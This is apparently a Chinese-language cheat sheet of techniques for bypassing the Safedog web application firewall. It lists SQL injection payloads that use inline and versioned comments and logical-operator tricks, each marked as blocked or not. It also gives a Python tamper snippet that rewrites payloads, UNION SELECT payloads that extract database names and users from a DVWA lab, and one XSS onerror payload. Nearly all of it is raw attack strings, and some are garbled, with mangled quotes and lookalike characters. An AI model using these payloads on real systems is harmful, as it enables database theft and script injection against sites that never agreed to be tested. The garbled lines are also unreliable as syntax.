1 sql注入绕过
kobe’ and 1=1# 触发安全狗
构造 /!union/ /!select/
union select 1,2
/!union/ /!select/ 1,2
1’ && true#
1’ || false#
%26 表示&&
1’ &&1# 拦截
1’ &&(1)# 不拦截
1’ xor 1# 不拦截
1’ xor true# 不拦截
1’ || 1# 拦截
1’ || (1)# 不拦截
1’ || true# 不拦截
order by 的绕过
内联注释绕过失败
/!order/ /!by/ 2# 无法绕过
a=/&id=1 union select schema_name from information_schema.schemata–+/
a=/&id=1 union select 1,database()#/
?id=/&id=1 union select 1,database()#/
union//select//1,2#
1’ /!union/ /!select/ 1,2#
1’ /!50001union////!50001select/ 1,2/!/
1’ /!50001union////!50001select/ 1,2/!/
绕过
1’ union/!90000aaa/select/!90000aaa/ 1,2#
1’ union/90000aaa/select/90000aaa/ 1,2# 报错
1’ union/!90000/select1,2# 报错
if payload:
payload=payload.replace(" “,”/!/")
payload=payload.replace("=","/!/=/!/")
payload=payload.replace(“AND”,"/!/AND/!/")
payload=payload.replace(“UNION”,“union/!88888cas/”)
payload=payload.replace("#","/!/#")
payload=payload.replace(“USER()”,“USER/!()/”)
payload=payload.replace(“DATABASE()”,“DATABASE/!()/”)
payload=payload.replace("–","/!/–")
payload=payload.replace(“SELECT”,"/!88888cas/select")
payload=payload.replace(“FROM”,"/!99999c//!99999c/from")
print payload
1’ union/!88888cas/ select/!88888cas/ 1,DATABASE/!()/# 绕过
1’ union/!999aa/ select/!88888cas/ database/!()/,USER/!()/ /!99999c//!99999c/from dvwa.users#
2 xss绕过
https://www.uedbox.com/post/54859/
<audio src=x οnerrοr=prompt(‘xss’)>